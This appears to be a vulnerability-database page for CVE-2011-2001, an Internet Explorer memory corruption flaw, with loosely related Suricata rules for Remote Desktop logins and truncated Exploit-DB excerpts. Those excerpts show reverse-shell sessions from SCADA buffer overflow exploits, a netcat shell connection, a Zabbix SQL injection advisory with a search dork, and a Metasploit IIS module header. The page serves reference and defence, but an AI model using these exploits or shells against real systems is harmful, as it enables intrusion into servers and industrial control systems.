CVE-2011-2001
Published 2011-10-12
Priority: P355, critical, 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EPSS: 43.13% (98.6th percentile)
Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code via an attempted access to a virtual function table after corruption of this table has occurred, aka "Virtual Function Table Corruption Remote Code Execution Vulnerability."
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
Suricata
ET REMOTE_ACCESS MS Terminal Server Root login
suricata·2011-04-22
CVE-2001-0540 ET REMOTE_ACCESS MS Terminal Server Root login
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 3389 (msg:"ET REMOTE_ACCESS MS Terminal Server Root login"; flow:established,to_server; content:"|03 00 00|"; depth:3; content:"|e0 00 00 00 00 00|"; distance:2; within:6; content:"Cookie|3a| mstshash=root|0d 0a|"; nocase; reference:cve,2001-0540; classtype:protocol-command-decode; sid:2012710; rev:2; metadata:created_at 2011_04_22, cve CVE_2001_0540, former_category INFO, confidence Medium, signature_severity Unknown, updated_at 2024_06_27;)
Suricata
ET REMOTE_ACCESS MS Remote Desktop Administrator Login Request
suricata·2011-04-22
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 3389 (msg:"ET REMOTE_ACCESS MS Remote Desktop Administrator Login Request"; flow:established,to_server; content:"|03 00 00|"; depth:3; content:"|e0 00 00 00 00 00|"; distance:2; within:6; content:"Cookie|3a| mstshash=admin"; distance:0; nocase; reference:cve,CAN-2001-0540; classtype:protocol-command-decode; sid:2012709; rev:6; metadata:created_at 2011_04_22, former_category INFO, confidence Medium, signature_severity Unknown, updated_at 2024_06_27;)
Suricata
ET INFO MS Remote Desktop Service User Login Request
suricata·2011-04-22
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 3389 (msg:"ET INFO MS Remote Desktop Service User Login Request"; flow:established,to_server; content:"|03 00 00|"; depth:3; content:"|e0 00 00 00 00 00|"; distance:2; within:6; content:"Cookie|3a| mstshash=service|0d 0a|"; nocase; reference:cve,CAN-2001-0540; classtype:protocol-command-decode; sid:2012712; rev:2; metadata:created_at 2011_04_22, confidence High, signature_severity Informational, updated_at 2024_03_06;)
Suricata
ET INFO MS Remote Desktop POS User Login Request
suricata·2011-04-22
CVE-2001-0540 ET INFO MS Remote Desktop POS User Login Request
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 3389 (msg:"ET INFO MS Remote Desktop POS User Login Request"; flow:established,to_server; content:"|03 00 00|"; depth:3; content:"|e0 00 00 00 00 00|"; distance:2; within:6; content:"Cookie|3a| mstshash=pos|0d 0a|"; nocase; reference:cve,2001-0540; classtype:protocol-command-decode; sid:2012711; rev:2; metadata:created_at 2011_04_22, cve CVE_2001_0540, confidence High, signature_severity Informational, updated_at 2024_03_06;)
Exploit-DB
CoDeSys SCADA 2.3 - Remote Buffer Overflow
exploitdb·2011-12-01
CVE-2011-5007 CoDeSys SCADA 2.3 - Remote Buffer Overflow
---
/*
See Also: http://aluigi.altervista.org/adv/codesys_1-adv.txt
CoDeSys v2.3 Industrial Control System Development Software
Remote Buffer Overflow Exploit for CoDeSys Scada webserver
Author : Celil UNUVER, SignalSEC Labs
www.signalsec.com
Tested on WinXP SP1 EN
THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!
--snip--
root@bt:~# ./codesys 192.168.1.36
CoDeSys v2.3 webserver Remote Exploit
by SignalSEC Labs - www.signalsec.com
[+]Sending payload to SCADA system!
[+]Connecting to port 4444 to get shell!
192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.36] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\3S Software\CoDeSys V
Exploit-DB
Zabbix 1.8.4 - 'popup.php' SQL Injection
exploitdb·2011-11-24
CVE-2011-4674 Zabbix 1.8.4 - 'popup.php' SQL Injection
---
# Exploit Title: Zabbix <= 1.8.4 SQL Injection
# Google Dork: "Zabbix 1.8.4 Copyright 2001-2010 by SIA Zabbix"
# Date: November 24th, 2011
# Author: Marcio Almeida
# Software Link:
http://sourceforge.net/projects/zabbix/files/ZABBIX%20Latest%20Stable/1.8.4/zabbix-1.8.4.tar.gz/download
# Version: <= 1.8.4
# Tested on: Linux
- Release date: November 24th, 2011
- Discovered by: Marcio Almeida
- Severity: High
- Google Dork: "Zabbix 1.8.4 Copyright 2001-2010 by SIA Zabbix"
I. VULNERABILITY
Zabbix <= 1.8.4 SQL Injection
II. BACKGROUND
Zabbix is an enterprise-class open source distributed monitoring solution.
Zabbix is software that monitors numerous parameters of a network and the
health and integrity of servers. Properly configured, Zabbix can
Exploit-DB
ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow
exploitdb·2011-09-12
CVE-2011-4535 ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow
---
[mr_me@neptune scadatec]$ php zip.php -t modbustagserver
[mr_me@neptune scadatec]$ nc -v 192.168.114.141 4444
Connection to 192.168.114.141 4444 port [tcp/krb524] succeeded!
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\ScadaTEC\ModbusTagServer\Projects>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'The reason they call it the American Dream is because you have to be asleep
to believe it.' ~ George Carlin
*/
if ($argc
software: target software
Example:
php ".$argv[0]." -t scadaphone
php ".$argv[0]." -t modbustagserver
"); die; }
function setArgs($argv){
$_ARG = array();
foreach ($argv as $arg){
if (ereg("--([^=]+)=(.*)", $arg, $reg)){
$_ARG[$
Exploit-DB
Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (MS01-026) (Metasploit)
exploitdb·2011-01-08
CVE-2001-0333 Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (MS01-026) (Metasploit)
---
##
# $Id: ms01_026_dbldecode.rb 11513 2011-01-08 00:25:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/proto/tftp'
class Metasploit3 'Microsoft IIS/PWS CGI Filename Double Decode Command Execution',
'Description' => %q{
This module will execute an arbitrary payload on a Microsoft IIS installation
that is vulnerable to the CGI double-decode vulnerability of 2001.
NOTE: This module will leave a metasploit payload in the IIS scripts directory.
}
http://www.securityfocus.com/bid/49966
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-081
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12223
Published: 2011-10-12